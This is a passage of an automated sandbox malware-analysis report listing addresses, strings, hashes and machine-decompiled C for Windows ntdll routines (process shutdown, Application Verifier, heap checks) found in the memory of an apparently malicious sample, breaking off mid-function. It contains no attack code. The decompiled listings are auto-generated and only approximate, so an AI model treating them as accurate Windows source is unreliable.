                                                                                                                                                                                  0x3334d035
                                                                                                                                                                                  0x3334d03f
                                                                                                                                                                                  0x3334d042
                                                                                                                                                                                  0x3334d044
                                                                                                                                                                                  0x3334d048
                                                                                                                                                                                  0x3334d04c
                                                                                                                                                                                  0x3334d050
                                                                                                                                                                                  0x3334d056
                                                                                                                                                                                  0x333aa5a1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d065
                                                                                                                                                                                  0x3334d067
                                                                                                                                                                                  0x3334d075
                                                                                                                                                                                  0x3334d07c
                                                                                                                                                                                  0x3334d081
                                                                                                                                                                                  0x3334d085
                                                                                                                                                                                  0x3334d08f
                                                                                                                                                                                  0x3334d093
                                                                                                                                                                                  0x3334d094
                                                                                                                                                                                  0x3334d09d
                                                                                                                                                                                  0x3334d0a5
                                                                                                                                                                                  0x3334d0a6
                                                                                                                                                                                  0x3334d0aa
                                                                                                                                                                                  0x3334d0b5
                                                                                                                                                                                  0x333aa52a
                                                                                                                                                                                  0x333aa52e
                                                                                                                                                                                  0x3334d194
                                                                                                                                                                                  0x3334d199
                                                                                                                                                                                  0x3334d19b
                                                                                                                                                                                  0x3334d19f
                                                                                                                                                                                  0x3334d19f
                                                                                                                                                                                  0x3334d1a9
                                                                                                                                                                                  0x333aa5ab
                                                                                                                                                                                  0x333aa5af
                                                                                                                                                                                  0x333aa5af
                                                                                                                                                                                  0x3334d1b4
                                                                                                                                                                                  0x3334d1b6
                                                                                                                                                                                  0x3334d1ba
                                                                                                                                                                                  0x3334d1ba
                                                                                                                                                                                  0x3334d1c1
                                                                                                                                                                                  0x333aa5bb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa5c1
                                                                                                                                                                                  0x333aa5c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa5d0
                                                                                                                                                                                  0x333aa5df
                                                                                                                                                                                  0x333aa5df
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d1c7
                                                                                                                                                                                  0x3334d1ca
                                                                                                                                                                                  0x3334d1de
                                                                                                                                                                                  0x3334d1e6
                                                                                                                                                                                  0x3334d1e6
                                                                                                                                                                                  0x3334d1cf
                                                                                                                                                                                  0x3334d1d4
                                                                                                                                                                                  0x3334d1d8
                                                                                                                                                                                  0x333aa5e6
                                                                                                                                                                                  0x333aa5ea
                                                                                                                                                                                  0x333aa5ef
                                                                                                                                                                                  0x333aa5ef
                                                                                                                                                                                  0x333aa5ef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d1d8
                                                                                                                                                                                  0x3334d1c1
                                                                                                                                                                                  0x333aa537
                                                                                                                                                                                  0x333aa541
                                                                                                                                                                                  0x333aa54d
                                                                                                                                                                                  0x333aa558
                                                                                                                                                                                  0x333aa558
                                                                                                                                                                                  0x333aa54d
                                                                                                                                                                                  0x333aa559
                                                                                                                                                                                  0x333aa55d
                                                                                                                                                                                  0x333aa562
                                                                                                                                                                                  0x333aa569
                                                                                                                                                                                  0x333aa569
                                                                                                                                                                                  0x3334d0bf
                                                                                                                                                                                  0x3334d0cc
                                                                                                                                                                                  0x333aa56f
                                                                                                                                                                                  0x333aa56f
                                                                                                                                                                                  0x3334d0d5
                                                                                                                                                                                  0x3334d1ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d1fc
                                                                                                                                                                                  0x3334d2de
                                                                                                                                                                                  0x3334d202
                                                                                                                                                                                  0x3334d20c
                                                                                                                                                                                  0x3334d215
                                                                                                                                                                                  0x3334d21a
                                                                                                                                                                                  0x3334d222
                                                                                                                                                                                  0x3334d22a
                                                                                                                                                                                  0x3334d232
                                                                                                                                                                                  0x3334d23d
                                                                                                                                                                                  0x3334d23e
                                                                                                                                                                                  0x3334d247
                                                                                                                                                                                  0x3334d24e
                                                                                                                                                                                  0x3334d24f
                                                                                                                                                                                  0x3334d25a
                                                                                                                                                                                  0x3334d25a
                                                                                                                                                                                  0x3334d261
                                                                                                                                                                                  0x3334d26d
                                                                                                                                                                                  0x3334d272
                                                                                                                                                                                  0x3334d27b
                                                                                                                                                                                  0x3334d283
                                                                                                                                                                                  0x3334d28b
                                                                                                                                                                                  0x3334d293
                                                                                                                                                                                  0x3334d2a1
                                                                                                                                                                                  0x3334d2a2
                                                                                                                                                                                  0x3334d2ab
                                                                                                                                                                                  0x3334d2b2
                                                                                                                                                                                  0x3334d2b3
                                                                                                                                                                                  0x3334d2c3
                                                                                                                                                                                  0x3334d2c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d2e5
                                                                                                                                                                                  0x3334d2c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d0db
                                                                                                                                                                                  0x3334d0e0
                                                                                                                                                                                  0x3334d192
                                                                                                                                                                                  0x3334d192
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d192
                                                                                                                                                                                  0x3334d0f0
                                                                                                                                                                                  0x3334d0f9
                                                                                                                                                                                  0x3334d0fe
                                                                                                                                                                                  0x3334d103
                                                                                                                                                                                  0x3334d10d
                                                                                                                                                                                  0x3334d10e
                                                                                                                                                                                  0x3334d116
                                                                                                                                                                                  0x3334d117
                                                                                                                                                                                  0x3334d120
                                                                                                                                                                                  0x3334d124
                                                                                                                                                                                  0x3334d125
                                                                                                                                                                                  0x3334d130
                                                                                                                                                                                  0x333aa580
                                                                                                                                                                                  0x333aa58f
                                                                                                                                                                                  0x333aa593
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa59b
                                                                                                                                                                                  0x333aa59b
                                                                                                                                                                                  0x3334d140
                                                                                                                                                                                  0x3334d149
                                                                                                                                                                                  0x3334d14e
                                                                                                                                                                                  0x3334d153
                                                                                                                                                                                  0x3334d158
                                                                                                                                                                                  0x3334d160
                                                                                                                                                                                  0x3334d168
                                                                                                                                                                                  0x3334d169
                                                                                                                                                                                  0x3334d172
                                                                                                                                                                                  0x3334d176
                                                                                                                                                                                  0x3334d177
                                                                                                                                                                                  0x3334d180
                                                                                                                                                                                  0x3334d184
                                                                                                                                                                                  0x3334d2c9
                                                                                                                                                                                  0x3334d2d7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d18a
                                                                                                                                                                                  0x3334d18a
                                                                                                                                                                                  0x3334d190
                                                                                                                                                                                  0x3334d190
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d190
                                                                                                                                                                                  0x3334d184
                                                                                                                                                                                  0x3334d0d5

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3334D06F
                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3334D263
                                                                                                                                                                                  • @, xrefs: 3334D2B3
                                                                                                                                                                                  • @, xrefs: 3334D09D
                                                                                                                                                                                  • h.73, xrefs: 333AA5D2
                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3334D136
                                                                                                                                                                                  • @, xrefs: 3334D24F
                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3334D0E6
                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3334D202
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.73
                                                                                                                                                                                  • API String ID: 0-3100190924
                                                                                                                                                                                  • Opcode ID: d472ca2eb526c3b15658a6593f437cafcf699e116f2c4f6bdc650734e0ae64e4
                                                                                                                                                                                  • Instruction ID: 429ce2820a27991f9ff66f2e43003bca88f56ca21d0a9472cdbc108bbec4bcb6
                                                                                                                                                                                  • Opcode Fuzzy Hash: d472ca2eb526c3b15658a6593f437cafcf699e116f2c4f6bdc650734e0ae64e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: FBA17BB29083459FE361CF24C880B9BB7E8AF84755F01892EF99896241DB74D948CF96
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E3337D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x3342c5e8);
				_t68 = E333A7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x33445da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x334437c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E333CE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x33445dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x33445da8 = 1;
				if( *0x334465f0 != 0) {
					_t137 =  *0x334491f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x334491e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push("true");
					E33354779(_t74, _t118);
				}
				if(( *0x3344391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x33449234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x33449234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x334468c8;
					if( *0x334468c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E333D0FC8();
							 *0x334468c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E3337D8F0();
					}
					_t68 = E3337D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x33445da0; // 0x3007460
				L8:
				if(_t129 != 0x33445d9c) {
					_t18 = _t129 - 0x10; // 0x3007450
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x3006b70
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x70129bf0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						L3336DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E3336F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						L3336DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E3337D886();
					}
					goto L8;
				}
				_t119 =  *0x33445b24; // 0x2fe2d40
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					L3336DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x33445b24; // 0x2fe2d40
					E3336F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E3337D88F();
				}
				goto L15;
			}


























                                                                                                                                                                                  0x3337d6d0
                                                                                                                                                                                  0x3337d6d2
                                                                                                                                                                                  0x3337d6d7
                                                                                                                                                                                  0x3337d6dc
                                                                                                                                                                                  0x3337d6e3
                                                                                                                                                                                  0x3337d6ed
                                                                                                                                                                                  0x3337d810
                                                                                                                                                                                  0x3337d813
                                                                                                                                                                                  0x3337d81f
                                                                                                                                                                                  0x3337d81f
                                                                                                                                                                                  0x3337d6f3
                                                                                                                                                                                  0x3337d6f9
                                                                                                                                                                                  0x3337d6fc
                                                                                                                                                                                  0x3337d6ff
                                                                                                                                                                                  0x3337d702
                                                                                                                                                                                  0x3337d709
                                                                                                                                                                                  0x333bf0c2
                                                                                                                                                                                  0x333bf0c2
                                                                                                                                                                                  0x3337d716
                                                                                                                                                                                  0x333bf0cd
                                                                                                                                                                                  0x333bf0e7
                                                                                                                                                                                  0x333bf0ec
                                                                                                                                                                                  0x333bf0ec
                                                                                                                                                                                  0x3337d71c
                                                                                                                                                                                  0x3337d71f
                                                                                                                                                                                  0x3337d724
                                                                                                                                                                                  0x3337d732
                                                                                                                                                                                  0x3337d86d
                                                                                                                                                                                  0x3337d873
                                                                                                                                                                                  0x3337d875
                                                                                                                                                                                  0x3337d877
                                                                                                                                                                                  0x3337d879
                                                                                                                                                                                  0x3337d87f
                                                                                                                                                                                  0x3337d87f
                                                                                                                                                                                  0x3337d738
                                                                                                                                                                                  0x3337d740
                                                                                                                                                                                  0x3337d742
                                                                                                                                                                                  0x3337d744
                                                                                                                                                                                  0x3337d744
                                                                                                                                                                                  0x3337d750
                                                                                                                                                                                  0x333bf0f4
                                                                                                                                                                                  0x333bf0f7
                                                                                                                                                                                  0x333bf0fe
                                                                                                                                                                                  0x333bf101
                                                                                                                                                                                  0x333bf108
                                                                                                                                                                                  0x333bf10b
                                                                                                                                                                                  0x333bf10d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bf113
                                                                                                                                                                                  0x333bf117
                                                                                                                                                                                  0x3337d7ed
                                                                                                                                                                                  0x3337d7ed
                                                                                                                                                                                  0x3337d7f3
                                                                                                                                                                                  0x3337d7fa
                                                                                                                                                                                  0x333bf13c
                                                                                                                                                                                  0x333bf13f
                                                                                                                                                                                  0x333bf145
                                                                                                                                                                                  0x333bf14a
                                                                                                                                                                                  0x333bf14a
                                                                                                                                                                                  0x333bf13f
                                                                                                                                                                                  0x3337d800
                                                                                                                                                                                  0x3337d804
                                                                                                                                                                                  0x3337d806
                                                                                                                                                                                  0x3337d806
                                                                                                                                                                                  0x3337d80b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337d80b
                                                                                                                                                                                  0x3337d756
                                                                                                                                                                                  0x3337d756
                                                                                                                                                                                  0x3337d75a
                                                                                                                                                                                  0x3337d75d
                                                                                                                                                                                  0x3337d766
                                                                                                                                                                                  0x3337d76c
                                                                                                                                                                                  0x3337d76e
                                                                                                                                                                                  0x3337d76e
                                                                                                                                                                                  0x3337d771
                                                                                                                                                                                  0x3337d774
                                                                                                                                                                                  0x3337d774
                                                                                                                                                                                  0x3337d777
                                                                                                                                                                                  0x3337d77a
                                                                                                                                                                                  0x3337d77a
                                                                                                                                                                                  0x3337d77d
                                                                                                                                                                                  0x3337d782
                                                                                                                                                                                  0x3337d78d
                                                                                                                                                                                  0x3337d794
                                                                                                                                                                                  0x3337d799
                                                                                                                                                                                  0x3337d79f
                                                                                                                                                                                  0x3337d79f
                                                                                                                                                                                  0x3337d7a1
                                                                                                                                                                                  0x3337d7a7
                                                                                                                                                                                  0x3337d7ac
                                                                                                                                                                                  0x3337d7af
                                                                                                                                                                                  0x3337d7b2
                                                                                                                                                                                  0x3337d7b6
                                                                                                                                                                                  0x3337d7da
                                                                                                                                                                                  0x3337d7da
                                                                                                                                                                                  0x3337d7b8
                                                                                                                                                                                  0x3337d7b9
                                                                                                                                                                                  0x3337d7c0
                                                                                                                                                                                  0x3337d7c5
                                                                                                                                                                                  0x3337d7cc
                                                                                                                                                                                  0x3337d7cf
                                                                                                                                                                                  0x3337d7cf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337d782
                                                                                                                                                                                  0x3337d7e1
                                                                                                                                                                                  0x3337d7e7
                                                                                                                                                                                  0x3337d7eb
                                                                                                                                                                                  0x3337d820
                                                                                                                                                                                  0x3337d827
                                                                                                                                                                                  0x3337d82c
                                                                                                                                                                                  0x3337d832
                                                                                                                                                                                  0x3337d834
                                                                                                                                                                                  0x3337d83a
                                                                                                                                                                                  0x3337d83f
                                                                                                                                                                                  0x3337d842
                                                                                                                                                                                  0x3337d84a
                                                                                                                                                                                  0x3337d84f
                                                                                                                                                                                  0x3337d856
                                                                                                                                                                                  0x3337d856
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 3337D879
                                                                                                                                                                                    • Part of subcall function 33354779: RtlDebugPrintTimes.NTDLL ref: 33354817
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 3446177414-1975516107
                                                                                                                                                                                  • Opcode ID: 6e9397d12116fe7f2fea9e2affec7161dd1ad24af62beb627b8f904cfc94718a
                                                                                                                                                                                  • Instruction ID: b0224f834b4835fc6db218abe2358e42ab9d1ff686b6ff22b484dc319732f9a6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e9397d12116fe7f2fea9e2affec7161dd1ad24af62beb627b8f904cfc94718a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651E4B5E043859FEB04DFA4C8847ADBBF1BF44314F58C169E400BB691DB799945CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333FF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                  • API String ID: 0-2224505338
                                                                                                                                                                                  • Opcode ID: 1c8f95ab112e1539847313285982d678bce1af36030099c2c8988b774902769d
                                                                                                                                                                                  • Instruction ID: 7c1d2dd0c687557905e8f079f0f3ea625b1b2e1b22a9b89c1c81ccf42a2ee5c7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c8f95ab112e1539847313285982d678bce1af36030099c2c8988b774902769d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 47511536902344FFE701CFA4CC84E5AB7E8EF046A4F54C599F845EB6A2CA76DA40CE10
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333D8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E333D8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E333D36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x33445a74 = _t52;
							 *0x33445000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x33445238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										L33346CC0(_t127, L"HandleTraces", 4, 0x334469d8, 4, 0);
									}
									L33346CC0(_t127, L"VerifierDebug", 4, 0x334469dc, 4, 0);
									L33346CC0(_t127, L"VerifierDlls", 1, 0x33445000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E333D98B2(0x33321b98, _v8, __eflags, _t127, _a12, 0x33445260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x33445260;
									_t128 = E333D8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E33381D66(0x33321b98, _t116, 0);
										 *0x33449234 = _v32;
										E33381D66(0x33321b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							L33346CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x33445a74; // 0x0
								goto L40;
							}
							 *0x33445a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x33445244 = 0x33445240;
				 *0x33445240 = 0x33445240;
				_t128 = E3337FBC0(0x33445220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x33449234 == 2) {
					_v29 = 0;
					_t128 = E33371934(0x33445308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x33445a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x33445d8c; // 0x2fe2d40
				_t8 = _t69 + 0x30; // 0x2fe1d08
				E333DEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E333D9429(_t115) >= 0) {
					_t130 =  *0x33445240; // 0x0
					while(1) {
						__eflags = _t130 - 0x33445240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E333D919C(_t97, _t130, 0x33445240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E333D8B5E(_t71);
					_t108 = 0x33321b88;
					_t128 = E3336F380(0x33321b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x33445278; // 0x0
						L15:
						_t76 = E3336CF00(_t108, 0, _t131, 0x33321b90, 0,  &_v16, 1, _v0);
						E33381D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x33449238 = _t88 ^ _v16;
							 *0x33449230 = 1;
						}
						 *0x33449231 = 1;
						 *0x33449232 = 1;
						E333D964A(E33381D66(_t108, 0, 1));
						_t124 =  *0x33445240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x33445240;
							if(_t124 == 0x33445240) {
								break;
							}
							_v30 = _t97;
							_t128 = E33371934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x334469dc & 0x00000008;
						if(( *0x334469dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E333D8EB8(E3334B910());
						}
						E333D9818();
						E3335E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E3336D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x33445d8c; // 0x2fe2d40
					_t10 = _t92 + 0x30; // 0x2fe1d08
					E333DEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
